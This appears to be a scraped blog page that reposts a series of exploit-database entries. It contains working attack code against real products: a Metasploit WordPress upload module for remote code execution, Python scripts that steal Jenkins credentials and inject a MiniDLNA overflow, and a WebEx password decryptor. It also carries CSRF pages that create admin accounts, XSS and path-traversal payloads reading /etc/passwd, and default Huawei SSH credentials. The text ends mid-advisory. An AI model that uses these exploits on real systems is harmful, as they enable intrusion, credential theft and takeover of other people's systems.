source: https://www.securityfocus.com/bid/61356/info
YardRadius is prone to multiple local format-string vulnerabilities.
Local attackers can leverage these issues to cause denial-of-service conditions. Due to nature of these issues, arbitrary code-execution within the context of the vulnerable application may also be possible.
YardRadius 1.1.2-4 is vulnerable; other versions may also be possible.
The following proof-of-concept is available:
ln -s radiusd %x
./%x -v
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863158200
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/61353/info
Barracuda CudaTel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Barracuda CudaTel 2.6.02.04 is vulnerable; other versions may also be affected.
http://www.example.com/gui/route/route?%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C
http://www.example.com/gui/route/route?_=1354073910062&bbx_outbound_route_flag_locked=%3C[CLIENT-SIDE SCRIPT
CODE!]%20%3C
http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C#
http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C#
// source: https://www.securityfocus.com/bid/61304/info
Cisco WebEx One-Click Client is prone to an information disclosure vulnerability.
Successful exploits may allow an attacker to disclose sensitive information such as stored passwords; this may aid in further attacks.
/*
WebEx One-Click Registry Key Decryptor
brad.antoniewicz@foundstone.coma
compile with gcc -o webex-onedecrypt -lssl webex-onedecrypt.c
Thanks to https://code.google.com/p/tps-cripto-itba/source/browse/trunk/src/criptography
for making life easy
see comments below
*/
#include <openssl/aes.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
unsigned char *
aes_ofb_encrypt(unsigned char * text, int length, unsigned char * key, unsigned char * iv)
{
unsigned char * outbuf = calloc(1,length);
int num = 0;
unsigned char liv[16];
memcpy(liv,iv,16);
AES_KEY aeskey;
//memset(outbuf, 0, 8);
AES_set_encrypt_key(key, 256, &aeskey);
AES_ofb128_encrypt(text, outbuf, length, &aeskey, liv, &num);
return outbuf;
}
unsigned char *
aes_ofb_decrypt(unsigned char * enc, int length, unsigned char * key, unsigned char * iv)
{
unsigned char * outbuf= calloc(1,length);
int num = 0;
unsigned char liv[16];
memcpy(liv,iv,16);
AES_KEY aeskey;
AES_set_encrypt_key(key, 256, &aeskey);
AES_ofb128_encrypt(enc, outbuf, length, &aeskey, liv, &num);
return outbuf;
}
void main() {
/*
This value is from
HKEY_CURRENT_USER\Software\WebEx\ProdTools\Password
*/
unsigned char * regVal = "\xcc\x6d\xc9\x3b\xa0\xcc\x4c\x76\x55\xc9\x3b\x9f";
/*
This value is from
HKEY_CURRENT_USER\Software\WebEx\ProdTools\PasswordLen
*/
int regLength = 12;
/*
This value is a combination of these two registry keys:
HKEY_CURRENT_USER\Software\WebEx\ProdTools\UserName
HKEY_CURRENT_USER\Software\WebEx\ProdTools\SiteName
Basicaly the username and the sitename padding to 32 characters, if the
two dont add up to 32 characters, its just repeated until it fits
*/
unsigned char key[32] = "braantonsiteaa.webex.com/siteaab";
/*
The IV is static, particularly complex value of 123456789abcdef....
*/
unsigned char iv[16] = { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12 };
/*
These are just for testing, you'd probably not have the password :)
*/
unsigned char * password = "bradbradbrad";
int pwLength = strlen((char *)password);
unsigned char * enc = NULL;
unsigned char * enc2 = NULL;
int i = 0;
printf("Reg Key Value = ");
enc = aes_ofb_encrypt(password, pwLength, key, iv);
for(i=0;i<pwLength;i++) {
printf("%02x ", enc[i]);
}
printf("\n");
printf("Password = ");
enc2 = aes_ofb_decrypt(regVal, regLength, key, iv);
for(i=0;i<regLength;i++) {
printf("%c", enc2[i]);
}
printf("\n");
}
source: https://www.securityfocus.com/bid/61309/info
MongoDB is prone to a remote code execution vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to execute arbitrary code within the context of the affected application.
MongoDB 2.4.4 is vulnerable; other versions may also be affected.
use databaseMapped
sizechunk=0x1338; chunk=""; for(i=0;i<sizechunk;i++){ chunk+="\x05\x7c\x77\x55\x08\x04\x00\x00"; } for(i=0;i<30000;i++){ db.my_collection.insert({my_chunk:chunk}) }
db.eval('Mongo.prototype.find("a",{"b":"c"},"d","e","f","g","h")');
source: https://www.securityfocus.com/bid/61282/info
ReadyMedia is prone to a remote heap-based buffer-overflow vulnerability.
Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
ReadyMedia prior to 1.1.0 are vulnerable.
#!/usr/bin/env python
#AAAAinject.py
# Author: Zachary Cutlip
# zcutlip@tacnetsol.com
# twitter: @zcutlip
#This script injects a buffer overflow into the ALBUM_ART table of
#MiniDLNA's SQLite database. When queried with the proper soap request,
#this buffer overflow demonstrates arbitrary code execution by placing a
#string of user-controlled 'A's in the CPU's program counter. This
#affects MiniDLNA version 1.0.18 as shipped with Netgear WNDR3700 version 3.
import math
import sys
import urllib,socket,os,httplib
import time
from overflow_data import DlnaOverflowBuilder
headers={"Host":"10.10.10.1"}
host="10.10.10.1"
COUNT=8
LEN=128
empty=''
overflow_strings=[]
overflow_strings.append("AA")
overflow_strings.append("A"*LEN)
overflow_strings.append("B"*LEN)
overflow_strings.append("C"*LEN)
overflow_strings.append("D"*LEN)
overflow_strings.append("A"*LEN)
overflow_strings.append("\x10\x21\x76\x15"*(LEN/4))
overflow_strings.append("\x10\x21\x76\x15"*(LEN/4))
overflow_strings.append("D"*LEN)
overflow_strings.append("D"*LEN)
overflow_strings.append("D"*LEN)
path_beginning='/AlbumArt/1;'
path_ending='-18.jpg'
details_insert_query='insert/**/into/**/DETAILS(ID,SIZE,TITLE,ARTIST,ALBUM'+\
',TRACK,DLNA_PN,MIME,ALBUM_ART,DISC)/**/VALUES("31337"'+\
',"PWNED","PWNED","PWNED","PWNED","PWNED","PWNED"'+\
',"PWNED","1","PWNED");'
objects_insert_query='insert/**/into/**/OBJECTS(OBJECT_ID,PARENT_ID,CLASS,DETAIL_ID)'+\
'/**/VALUES("PWNED","PWNED","container","31337");'
details_delete_query='delete/**/from/**/DETAILS/**/where/**/ID="31337";'
objects_delete_query='delete/**/from/**/OBJECTS/**/where/**/OBJECT_ID="PWNED";'
def build_injection_req(query):
request=path_beginning+query+path_ending
return request
def do_get_request(request):
conn=httplib.HTTPConnection(host,8200)
conn.request("GET",request,"",headers)
conn.close()
def build_update_query(string):
details_update_query='update/**/DETAILS/**/set/**/ALBUM_ART=ALBUM_ART'+\
'||"'+string+'"/**/where/**/ID="31337";'
return details_update_query
def clear_overflow_data():
print "Deleting existing overflow data..."
request=build_injection_req(details_delete_query)
do_get_request(request)
request=build_injection_req(objects_delete_query)
do_get_request(request)
time.sleep(1)
def insert_overflow_data():
print("Setting up initial database records....")
request=build_injection_req(objects_insert_query)
do_get_request(request)
request=build_injection_req(details_insert_query)
do_get_request(request)
print("Building long ALBUM_ART string.")
for string in overflow_strings:
req=build_injection_req(build_update_query(string))
do_get_request(req)
clear_overflow_data()
insert_overflow_data()
source: https://www.securityfocus.com/bid/61196/info
Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can leverage these issues by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
Apache Struts 2.0.0 prior to 2.3.15.1 are vulnerable.
http://www.example.com/struts2-showcase/fileupload/upload.action?redirect:http://www.example.com/
http://www.example.com/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23
# Exploit Title: Jenkins Unauthenticated Credential Recovery
# Disclosure Date: 10/14/2015
# Response Date: 10/14/2015
# Response: "Recommend this be rejected as a vulnerability."
# Full report including response: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html
# Vendor Homepage: https://jenkins-ci.org/
# Tested on: Jenkins v1.633
# Author = 'Th3R3p0' | Justin Massey
# Google Dork: intitle:"Dashboard [Jenkins]" Credentials
import requests
import re
from BeautifulSoup import BeautifulSoup
import urllib
# Usage: Modify the URL below to match the target host and port
# Must have trailing slash at end of URL
url='http://192.168.1.151:8080/'
# makes request to gather all users with stored credentials
r= requests.get(url + 'credential-store/domain/_/')
soup = BeautifulSoup(r.text)
# loop to go through all hrefs and match the regex "credential" and add the urls to the users list
users = []
for link in soup.body.findAll('a', href=True):
m = re.match("credential", link['href'])
if m:
if link['href'] not in users:
users.append(link['href'])
for users in users:
r2 = requests.get(url + 'credential-store/domain/_/'+users+'/update')
soup2 = BeautifulSoup(r2.text)
# Finds the user and password value in html and stores in encPass variable
user = soup2.body.findAll(attrs={"name" : "_.username"})[0]['value']
encPass = soup2.body.findAll(attrs={"name" : "_.password"})[0]['value']
# Encodes the password to www-form-urlencoded standards needed for the expected content type
encPassEncoded = urllib.quote(encPass, safe='')
# Script to run in groovy scripting engine to decrypt the password
script = 'script=hudson.util.Secret.decrypt+%%27' \
'%s'\
'%%27&json=%%7B%%22script%%22%%3A+%%22hudson.util.Secret.decrypt+%%27' \
'%s' \
'%%27%%22%%2C+%%22%%22%%3A+%%22%%22%%7D&Submit=Run' % (encPassEncoded, encPassEncoded)
# Using sessions because the POST requires a session token to be present
with requests.Session() as s:
r3 = s.get(url+'script')
headers = {'content-type': 'application/x-www-form-urlencoded'}
r3 = s.post(url+'script',data=script, headers=headers)
soup3 = BeautifulSoup(r3.text)
# Extracts password from body
password = soup3.body.findAll('pre')[1].text
password = re.sub('Result:', '', password)
print "User: %s | Password:%s" % (user, password)
# Exploit Title: YESWIKI 0.2 - Path Traversal (template param)
# Date: 2015-11-10
# Exploit Author: HaHwul
# Exploit Author Blog: http://www.codeblack.net
# Vendor Homepage: http://yeswiki.net
# Software Link: https://github.com/YesWiki/yeswiki
# Version: yeswiki 0.2
# Tested on: Debian [Wheezy] , Ubuntu
# CVE : none
# ===========================================
<!-- Open Browser: http://127.0.0.1/vul_test/yeswiki/wakka.php?wiki=HomePage/diaporama&template=/../../../../../../../../../../../../etc/passwd
--><br>
# Exploit Code<br>
# ===========================================
<br><br>
<form name="yeswiki_traversal2_poc" action="http://127.0.0.1/vul_test/yeswiki/wakka.php" method="GET">
<input type="hidden" name="wiki" value="HomePage/diaporama">
Target: Edit HTML Code<br>
File: <input type="text" name="template" value="/../../../../../../../../../../../../etc/passwd"><br>
<input type="submit" value="Exploit">
</form>
<!-- Auto Sumbit
<script type="text/javascript">document.forms.yeswiki_traversal2_poc.submit();</script>
-->
# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems
# Date: 10.11.2015
# Exploit Author: Murat Sahin (@murtshn)
# Vendor Homepage: Huawei
# Version: HG630a and HG630a-50
# Tested on: linux,windows
Adsl modems force you to change admin web interface password. Even though
you can change admin password on the web interface, the password you
assign does not apply to ssh. So, SSH password always will be
'Username:admin Password:admin'.
Ex:
*ssh admin@modemIP <admin@192.168.1.1>*
admin@modemIP <admin@192.168.1.1>'s password:*admin*
PTY allocation request failed on channel 0
------------------------------
-
-----Welcome to ATP Cli------
-------------------------------
ATP>?
?
cls
debug
help
save
?
exit
ATP>shell
shell
BusyBox vv1.9.1 (2013-12-31 16:16:20 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# cat /proc/version
cat /proc/version
Linux version 2.6.30 (y00179387@localhost) (gcc version 4.4.2
(Buildroot 2010.02-git) ) #10 SMP PREEMPT Tue Dec 31 16:20:50 CST 2013
#
Source: https://code.google.com/p/google-security-research/issues/detail?id=614
The following heap-based out-of-bounds memory read has been encountered in FreeType. It has been reproduced with the current version of freetype2 from master git branch, with a 64-bit build of the ftbench utility compiled with AddressSanitizer:
$ ftbench <file>
Attached are three POC files which trigger the conditions.
---
$ freetype2-demos/bin/ftbench asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b
ftbench results for font `asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b'
-------------------------------------------------------------------------------------
family: (null)
style: (null)
number of seconds for each test: 2.000000
starting glyph index: 0
face size: 10ppem
font preloading into memory: no
load flags: 0x0
render mode: 0
CFF engine set to Adobe
TrueType engine set to version 35
maximum cache size: 1024KiByte
executing tests:
Load =================================================================
==22366==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eb55 at pc 0x00000069e2fc bp 0x7fffc4670610 sp 0x7fffc4670608
READ of size 1 at 0x60200000eb55 thread T0
#0 0x69e2fb in tt_sbit_decoder_load_bit_aligned freetype2/src/sfnt/ttsbit.c:834:19
#1 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
#2 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#3 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15
#4 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
#5 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#6 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19
#7 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13
#8 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15
#9 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13
#10 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15
#11 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13
#12 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15
#13 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9
0x60200000eb55 is located 0 bytes to the right of 5-byte region [0x60200000eb50,0x60200000eb55)
allocated by thread T0 here:
#0 0x4bc4a8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x756740 in ft_alloc freetype2/src/base/ftsystem.c:74:12
#2 0x51b4e7 in ft_mem_qalloc freetype2/src/base/ftutil.c:76:15
#3 0x51abb1 in FT_Stream_EnterFrame freetype2/src/base/ftstream.c:269:12
#4 0x51a800 in FT_Stream_ExtractFrame freetype2/src/base/ftstream.c:200:13
#5 0x69ccab in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1036:10
#6 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#7 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15
#8 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
#9 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#10 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19
#11 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13
#12 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15
#13 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13
#14 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15
#15 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13
#16 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15
#17 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9
SUMMARY: AddressSanitizer: heap-buffer-overflow freetype2/src/sfnt/ttsbit.c:834:19 in tt_sbit_decoder_load_bit_aligned
Shadow bytes around the buggy address:
0x0c047fff9d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9d60: fa fa fa fa fa fa fa fa fa fa[05]fa fa fa fd fa
0x0c047fff9d70: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9d80: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9d90: fa fa fd fa fa fa 04 fa fa fa 00 fa fa fa fd fa
0x0c047fff9da0: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff9db0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==22366==ABORTING
---
The issue was reported in https://savannah.nongnu.org/bugs/?46379.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38662.zip
Information
=================================
Name: CSRF Vulnerability in TestLink 1.9.14
Affected Software: TestLink
Affected Versions: 1.9.14 and possibly below
Vendor Homepage: http://testlink.org/
Severity: High
Status: Fixed
Vulnerability Type:
=================================
Cross Site Request Forgery (CSRF)
CVE Reference:
=================================
Not assigned
Technical Details:
=================================
Even though the use of CSRF tokens are being implemented in the
application, they aren't properly
validated at the server side. This allows malicious requests to be
generated by the attacker and
get them processed by the server on behalf of the victim. By
exploiting the vulnerability,
the attacker will be able to create user accounts with administrator
privileges on the application.
Exploit Code
=================================
<html lang="en">
<head>
<title>CSRF Exploit to Create New Administrator Account</title>
</head>
<body>
<form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php"
id="formid" method="post">
<input type="hidden" name="CSRFName" value="" />
<input type="hidden" name="CSRFToken" value="" />
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="user_login" value="" />
<input type="hidden" name="login" value="new_admin" />
<input type="hidden" name="firstName" value="new_administrator_fname" />
<input type="hidden" name="lastName" value="new_administrator_lname" />
<input type="hidden" name="password" value="new_administrator_password" />
<input type="hidden" name="emailAddress" value="new_administrator@admin.com" />
<input type="hidden" name="rights_id" value="8" />
<input type="hidden" name="locale" value="en_GB" />
<input type="hidden" name="authentication" value="" />
<input type="hidden" name="user_is_active" value="on" />
<input type="hidden" name="doAction" value="doCreate" />
<input type="hidden" name="do_update" value="Save" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
Exploitation Technique:
===================================
Remote
Severity Level:
===================================
High
Advisory Timeline
===================================
Sat, 7 Nov 2015 13:14:33 +0530 - First Contact
Sat, 7 Nov 2015 08:52:14 +0100 - Vendor Response
Sat, 7 Nov 2015 13:00:54 +0100 - Vendor Fixed
Sun, 8 Nov 2015 19:03:00 +0530 - Public Disclosure
Solution
====================================
This vulnerability is fixed in TestLink 1.9.15 (Tauriel)
Fix: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/1cb1f78f1a50f6e6819bcbadeae345eb3213c487
Credits & Authors
====================================
Aravind C Ajayan, Balagopal N
'''
********************************************************************************************
# Exploit Title: POP Peeper SEH Over-write.
# Date: 9/14/2015
# Exploit Author: Un_N0n
# Software Link: http://www.esumsoft.com/download
# Version: v4.0.1
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[DUMP:]
'''
EAX 00000000
ECX 20203029
EDX 77C5660D ntdll.77C5660D
EBX 00000000
ESP 0012EC5C
EBP 0012EC7C
ESI 00000000
EDI 00000000
EIP 20203029
==============================
STACK:
0012FBF4 41414141
0012FBF8 41414141
0012FBFC 41414141
0012FC00 41414141
0012FC04 41414141
0012FC08 909020EB Pointer to next SE>
0012FC0C 20203029 SE handler
0012FC10 43434343
0012FC14 43434343
0012FC18 43434343
0012FC1C 43434343
0012FC20 43434343
0012FC24 43434343
0012FC28 43434343
===============================
'''
[Steps to Produce the Crash]:
1- Open 'POPPeeper.exe'
2- Goto Accounts->Add->CreateSingleAccount.
3- After entering the email address, the option for Account name will appear,
enter the contents of crash.txt in it->Save.
4- Then compose a new mail->In TO field and Subject field, enter the contents of crash.txt
5- Save as Draft, software will crash.
6- Open up "POPPeeper.exe" again.
7- Click on Check Mail option, Software will crash.
Everytime you click on Check mail, it will crash as it will load the saved DRAFT.
[Code to produce CRASH.txt]
'''
buffer = "A"*66666
file = "crash.txt"
f = open(file,'w')
f.write(buffer)
f.close()
'''
[Extra Info:]
Offset : 2052
**********************************************************************************************
'''
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress Ajax Load More PHP Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary file upload in the WordPress Ajax Load More
version 2.8.1.1. It allows to upload arbitrary php files and get remote code
execution. This module has been tested successfully on WordPress Ajax Load More
2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.
},
'Author' =>
[
'Unknown', # Identify yourself || send an PR here
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['WPVDB', '8209']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Ajax Load More 2.8.1.1', {}]],
'DisclosureDate' => 'Oct 10 2015',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
], self.class
)
end
def check
check_plugin_version_from_readme('ajax-load-more', '2.8.1.2')
end
def username
datastore['WP_USERNAME']
end
def password
datastore['WP_PASSWORD']
end
def get_nonce(cookie)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(wordpress_url_backend, 'admin.php'),
'vars_get' => {
'page' => 'ajax-load-more-repeaters'
},
'cookie' => cookie
)
if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/
return Regexp.last_match[1]
else
return nil
end
end
def exploit
vprint_status("#{peer} - Trying to login as #{username}")
cookie = wordpress_login(username, password)
fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil?
vprint_status("#{peer} - Trying to get nonce")
nonce = get_nonce(cookie)
fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil?
vprint_status("#{peer} - Trying to upload payload")
# This must be default.php
filename = 'default.php'
print_status("#{peer} - Uploading payload")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
'vars_post' => {
'action' => 'alm_save_repeater',
'value' => payload.encoded,
'repeater' => 'default',
'type' => 'default',
'alias' => '',
'nonce' => nonce
},
'cookie' => cookie
)
if res
if res.code == 200 && res.body.include?('Template Saved Successfully')
register_files_for_cleanup(filename)
else
fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
end
else
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end
print_status("#{peer} - Calling uploaded file")
send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
)
end
end
<!--
# Exploit Title: Unauthenticated Stored Xss
# Date: 11/6/15
# Exploit Author: Nu11By73
# Vendor Homepage: comcast.net and arrisi.com
# Version: eMTA & DOCSIS Software Version: 10.0.59.SIP.PC20.CT
Software Image Name:TG1682_2.0s7_PRODse
Advanced Services:TG1682G
Packet Cable:2.0
# Tested on: Default Install
-->
<html>
<p>Unauth Stored CSRF/XSS - Xfinity Modem</p>
<form method="POST" action="http://192.168.0.1/actionHandler/ajax_managed_services.php">
<input type="hidden" name="set" value="true" />
<input type="hidden" name="UMSStatus" value="Enabled" />
<input type="hidden" name="add" value="true" />
<input type="hidden" name="service" value="test><script>alert(1)</script>" / >
<input type="hidden" name="protocol" value="TCP" / >
<input type="hidden" name="startPort" value="1" />
<input type="hidden" name="endPort" value="2" />
<input type="hidden" name="block" value="true" />
<input type="submit" title="Enable Service" />
</form>
</html>
source: https://www.securityfocus.com/bid/61158/info
PrestaShop is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
PrestaShop 1.5.4 is vulnerable; other versions may also be affected.
<html>
<head>
<body>
<img src="http://www.example.com/language/cart?add=&id_product=[Product ID]" width=0 height=0>
</body>
</head>
</html>
source: https://www.securityfocus.com/bid/61156/info
Corda .NET Redirector is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Corda .NET Redirector 7.3.11.6715 is vulnerable; other versions may also be affected.
http://www.example.com/Corda/redirector.corda/? () _FILEhttp://<URL>/?<script>alert('Text')</script><iframe src=http://www.example1.com></iframe>@_TEXTDESCRIPTIONEN
# Date: 06.11.2015
# Exploit Author: Dawid Golunski
# Vendor Homepage: https://developers.google.com/adwords/api/docs/clientlibraries
# Software Link: https://github.com/googleads/googleads-php-lib
# Version: Google AdWords API client libraries - XML eXternal Entity Injection (XXE)
=============================================
- Release date: 06.11.2015
- Discovered by: Dawid Golunski
- Severity: Medium/High
=============================================
I. VULNERABILITY
-------------------------
Google AdWords API client libraries - XML eXternal Entity Injection (XXE)
Confirmed in googleads-php-lib <= 6.2.0 for PHP, AdWords libraries:
googleads-java-lib for Java, and googleads-dotnet-lib for .NET are also likely
to be affected.
II. BACKGROUND
-------------------------
- AdWords API
"The AdWords API is a collection of web services that you can use to build
applications that manage AdWords accounts and their associated campaign data.
While the AdWords API is based on SOAP 1.1, high-level client libraries are
provided to help you develop applications more quickly."
AdWords API client libraries are available for different platforms
such as PHP, .NET, Java etc.
These can be found at:
https://developers.google.com/adwords/api/docs/clientlibraries
III. INTRODUCTION
-------------------------
As Google AdWords is based on SOAP protocol that uses XML to transfer the data,
client API libraries should have necessary preventions against XML eXternal
Entity injection attacks. However, an independent research found the necessary
preventions to be lacking in several Google AdWords API client libraries,
which could allow XXE attacks on applications/servers that make use of them.
XXE (XML eXternal Entity) attack is an attack on an application that parses XML
input from untrusted sources using incorrectly configured XML parser.
The application may be forced to open arbitrary files and/or network resources.
Exploiting XXE issues on PHP applications may also lead to denial of service or
in some cases (when an 'expect' PHP module is installed) lead to command
execution.
IV. DESCRIPTION
-------------------------
This advisory will focus on PHP version of the AdWords API client library.
Other versions of the client library such as .NET and Java seem to be
vulnerable in a similar way.
googleads-php-lib contains the following function which queries WSDL from the
remote google adwords server:
---[ build_lib/WSDLInterpreter/WSDLInterpreter.php ]---
protected function loadWsdl($wsdlUri, $proxy = null) {
// Set proxy.
if ($proxy) {
$opts = array(
'http' => array(
'proxy' => $proxy,
'request_fulluri' => true
)
);
$context = stream_context_get_default($opts);
libxml_set_streams_context($context);
}
$this->dom = new DOMDocument();
$this->dom->load($wsdlUri,
LIBXML_DTDLOAD|LIBXML_DTDATTR|LIBXML_NOENT|LIBXML_XINCLUDE);
$this->serviceNamespace =
$this->dom->documentElement->getAttribute('targetNamespace');
}
-------------------------------------------------------
The function connects to the API endpoint to get the WSDL document describing
the functionality of the AdWords web service in XML.
For security reasons Google AdWords API can only be accessed via HTTPS.
However, the above code does not set appropriate SSL settings on the
https:// stream context. It fails to assign Certificate Authority (CA),
and turn the verify_peer option to ON.
It uses the stream_context_get_default() to get the default context,
which on all PHP versions below PHP 5.6.x (see references below) does not
validate the CA by default.
Because of this, applications using the AdWords API library may be tricked into
retrieving data from untrusted sources pretending to be adwords.google.com.
The above code does not provide any XXE injection attack prevention.
It does not disable external entity processing. To make it worse,
it specifically enables it via the LIBXML parameters provided to the
dom->load() function so an XXE injection attack would work even on
systems that have the newest and fully patched version of libxml library
which does not process the entities by default.
Another vulnerable part of the application is located in the code:
---[ src/Google/Api/Ads/Common/Util/XmlUtils.php ]---
public static function GetDomFromXml($xml) {
set_error_handler(array('XmlUtils', 'HandleXmlError'));
$dom = new DOMDocument();
$dom->loadXML($xml,
LIBXML_DTDLOAD | LIBXML_DTDATTR | LIBXML_NOENT | LIBXML_XINCLUDE);
restore_error_handler();
return $dom;
}
-----------------------------------------------------
which is used by the AdsSoapClient class to process SOAP requests. It
also activates the ENTITY processing even if libxml parser is set to
ingore them by default. AdsSoapClient can be configured to verify SSL peer
in SSL communication via the settings INI file but this option is set to
off by default.
These SSL settings, and the XML ENTITY processing combined make applications
using the AdWords API vulnerable to XXE injection attacks.
For the attack to be successful, an attacker needs to
perform a MitM attack to impersonate adwords.google.com server (eg. via DNS
poisoning/spoofing/proxy attacks, ARP spoofing, etc.) to inject malicious
XML input.
V. PROOF OF CONCEPT
-------------------------
Below is a test application that makes use of the PHP Google AdWords API
library.
The application simply connects to the AdWords API endpoint to retrieve the
